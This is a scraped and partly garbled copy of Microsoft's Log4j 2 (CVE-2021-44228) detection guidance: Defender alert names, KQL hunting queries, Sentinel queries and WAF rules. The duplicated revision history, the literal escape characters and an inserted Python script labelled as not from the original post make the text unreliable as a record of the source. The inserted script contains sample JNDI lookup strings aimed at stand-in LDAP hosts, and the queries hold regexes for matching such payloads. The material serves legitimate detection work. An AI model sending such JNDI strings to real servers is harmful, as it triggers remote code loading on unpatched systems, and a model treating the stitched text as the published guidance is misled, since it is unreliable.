Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)
Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.
#### Revision history
* **[01/19/2022]** _New information about an unrelated vulnerability we discovered while investigating Log4j attacks_
* **[01/11/2022]** _New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries_
* **[01/10/2022]** _Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_
* **[01/07/2022]** _Added a new rule group in Azure Web Application Firewall (WAF)_
* **[12/27/2021]** _New capabilities in threat and vulnerability management including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._
* **[12/22/2021]** _Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._
* **[12/21/2021]** _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._
* **[12/17/2021]** _New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._
* **[12/16/2021]** _New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._
* **[12/15/2021]** _Details about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._
* **[12/14/2021]** _New insights about multiple threat actors taking advantage of this vulnerability, including nation-state actors and access brokers linked to ransomware._
The post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).
[Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more 
payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. 
These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j 
vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. 
Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-4428)"_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. 
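As an added example (not code from the original post), the following Python script applies the same `contains "jndi:"` test as the CloudAppEvents query below to a few constructed cloud-app style events, but first collapses the `${lower:x}`, `${upper:x}` and `${name:-default}` lookups that Log4j 2 resolves before performing the JNDI lookup, so that split-up keywords are still caught; it then extracts the scheme and host for triage, in the spirit of the regex query further down. The field names follow the query's columns; the sample events, addresses and hostnames are constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Lookup forms that Log4j 2 resolves to plain text before the JNDI lookup runs.
# Nested forms such as ${${lower:j}ndi:...} hide the keyword from a naive substring test:
#   ${lower:X} -> x     ${upper:x} -> X     ${name:-default} / ${::-default} -> default
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# Same scheme list as the page's KQL regex; the host stops at '/', '$', '{' or '}'.
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>ldap|ldaps|rmi|dns|iiop|http|https)://(?P<host>[^/${}]+)(?P<path>/[^}]*)?\}",
    re.IGNORECASE,
)

# The CloudAppEvents columns the KQL query inspects.
CHECKED_FIELDS = ("UserAgent", "AccountDisplayName", "Application", "AdditionalFields")


def normalize_lookups(value: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost-first until the string stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), value)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


@dataclass
class Finding:
    field: str    # which event field carried the string
    scheme: str   # ldap/rmi/... or "unknown" when only the substring test fired
    host: str     # host[:port] the vulnerable application would be made to connect to
    raw: str      # original, un-normalized field value for the analyst


def scan_event(event: Dict[str, object]) -> List[Finding]:
    """Apply the query's `contains "jndi:"` test, then pull out triage detail."""
    findings = []
    for field in CHECKED_FIELDS:
        value = event.get(field)
        if not isinstance(value, str):
            continue
        norm = normalize_lookups(value)
        if "jndi:" not in norm.lower():
            continue
        m = _JNDI.search(norm)
        if m:
            findings.append(Finding(field, m.group("scheme").lower(), m.group("host"), value))
        else:
            # Parity with the KQL: a substring hit without a parseable URL is still reported.
            findings.append(Finding(field, "unknown", "", value))
    return findings


def scan_events(events: List[Dict[str, object]]) -> List[Tuple[int, Finding]]:
    return [(i, f) for i, e in enumerate(events) for f in scan_event(e)]


# Constructed sample events (not real telemetry); addresses use documentation ranges and names.
SAMPLE_EVENTS = [
    {"ActionType": "LogOn", "UserAgent": "Mozilla/5.0 (Windows NT 10.0)", "AccountDisplayName": "alice"},
    {"ActionType": "LogOn", "UserAgent": "${jndi:ldap://203.0.113.10:1389/a}", "AccountDisplayName": "bob"},
    {"ActionType": "LogOn", "UserAgent": "curl/7.68.0",
     "AccountDisplayName": "${${lower:j}ndi:${::-l}dap://scanner.example.invalid/x}"},
    {"ActionType": "LogOn", "UserAgent": "ok", "AdditionalFields": '{"note":"${jndi:foo://x}"}'},
]

if __name__ == "__main__":
    for idx, finding in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {finding.field} -> {finding.scheme} {finding.host!r} (raw={finding.raw!r})")
```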
\n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. 
\n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. 
It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. 
These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. 
Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. 
Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. 
It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. 
If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. 
Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. 
This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).

### Azure Web Application Firewall (WAF)

In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1, available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1, available for Azure Application Gateway V2 regional deployments.

To help detect and mitigate the Log4Shell vulnerability by inspecting request headers, URI, and body, we have released the following:

 * For Azure Front Door deployments, we have updated the rule **944240 "Remote Command Execution"** under Managed Rules
 * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules

These rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules have therefore already received enhanced protection for the Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.

**Recommendation**: Customers who have not already done so are recommended to enable a WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 on Application Gateway V2, to immediately enable protection from this threat. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required.

_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1_

_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_

Note: The above protection is also available in the Default Rule Set (DRS) 2.0 preview and the OWASP ModSecurity Core Rule Set (CRS) 3.2 preview, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.

More information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).

## Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update it with new indicators as they are discovered: [Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>). The corresponding Microsoft Sentinel detection is [Log4J_IPIOC_Dec112021.yaml](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>).

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

#### Revision history

**[01/19/2022]** _New information about an unrelated vulnerability we discovered while investigating Log4j attacks_

**[01/11/2022]** _New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries_

**[01/10/2022]** _Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_

**[01/07/2022]** _Added a new rule group in Azure Web Application Firewall (WAF)_

**[12/27/2021]** _New capabilities in threat and vulnerability management, including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution_

**[12/22/2021]** _Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365_

**[12/21/2021]** _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal_

**[12/17/2021]** _New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries_

**[12/16/2021]** _New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections_

**[12/15/2021]** _Details about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management_

**[12/14/2021]** _New insights about multiple threat actors taking advantage of this vulnerability, including nation-state actors and access brokers linked to ransomware_

The post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

